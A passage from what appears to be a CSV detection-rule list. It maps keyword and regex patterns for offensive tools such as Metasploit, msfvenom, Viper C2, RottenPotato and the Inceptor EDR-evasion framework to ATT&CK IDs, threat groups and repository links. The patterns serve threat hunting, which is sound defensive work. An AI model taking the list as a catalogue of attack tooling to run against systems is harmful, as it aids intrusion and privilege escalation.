and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52355" "*msfconsole.*",".{0,1000}msfconsole\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52356" "*msfconsole_spec*",".{0,1000}msfconsole_spec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52357" "*msfcrawler.*",".{0,1000}msfcrawler\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52358" "*msfd.rb*",".{0,1000}msfd\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52359" "*msfdb --component*",".{0,1000}msfdb\s\-\-component.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52360" "*msfdb --use-defaults*",".{0,1000}msfdb\s\-\-use\-defaults.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52361" "*msfdb_helpers*",".{0,1000}msfdb_helpers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52362" "*msfencode*",".{0,1000}msfencode.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52363" "*msfJavaToolkit*",".{0,1000}msfJavaToolkit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52364" "*msf-json-rpc.*",".{0,1000}msf\-json\-rpc\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52365" "*msf-json-rpc.ru*",".{0,1000}msf\-json\-rpc\.ru.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52366" "*msflag.ps1*",".{0,1000}msflag\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52367" "*MsfModule*",".{0,1000}MsfModule.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52368" "*msfmodule.py*",".{0,1000}msfmodule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52369" "*MsfModuleAsFunction*",".{0,1000}MsfModuleAsFunction.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration 
tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52370" "*msfpattern.*",".{0,1000}msfpattern\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52371" "*msfpayload*",".{0,1000}msfpayload.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52372" "*msfpc.sh*",".{0,1000}msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","N/A","10","1261","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z","52373" "*msfrelay.py*",".{0,1000}msfrelay\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52375" "*msf-revhttps*",".{0,1000}msf\-revhttps.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","52376" "*MSFRottenPotato*",".{0,1000}MSFRottenPotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52377" "*MSFRottenPotato.*",".{0,1000}MSFRottenPotato\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52378" "*MSFRottenPotato.dll*",".{0,1000}MSFRottenPotato\.dll.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","52379" "*MSFRottenPotato.exe*",".{0,1000}MSFRottenPotato\.exe.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","52380" "*MSFRottenPotatoTestHarness.exe*",".{0,1000}MSFRottenPotatoTestHarness\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","52381" 
"*MSFRottenPotatoTestHarness.exe*",".{0,1000}MSFRottenPotatoTestHarness\.exe.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","52382" "*msf-sgn.raw*",".{0,1000}msf\-sgn\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","52383" "*msfshellcode_payload.bin*",".{0,1000}msfshellcode_payload\.bin.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","52384" "*msfstaged.exe *",".{0,1000}msfstaged\.exe\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","52385" "*msfupdate*",".{0,1000}msfupdate_spec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52386" "*msfvemonpayload*",".{0,1000}msfvemonpayload.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z","52387" "*msfvenom *",".{0,1000}msfvenom\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52388" "*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52389" "*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52390" "*--msfvenom *",".{0,1000}\-\-msfvenom\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
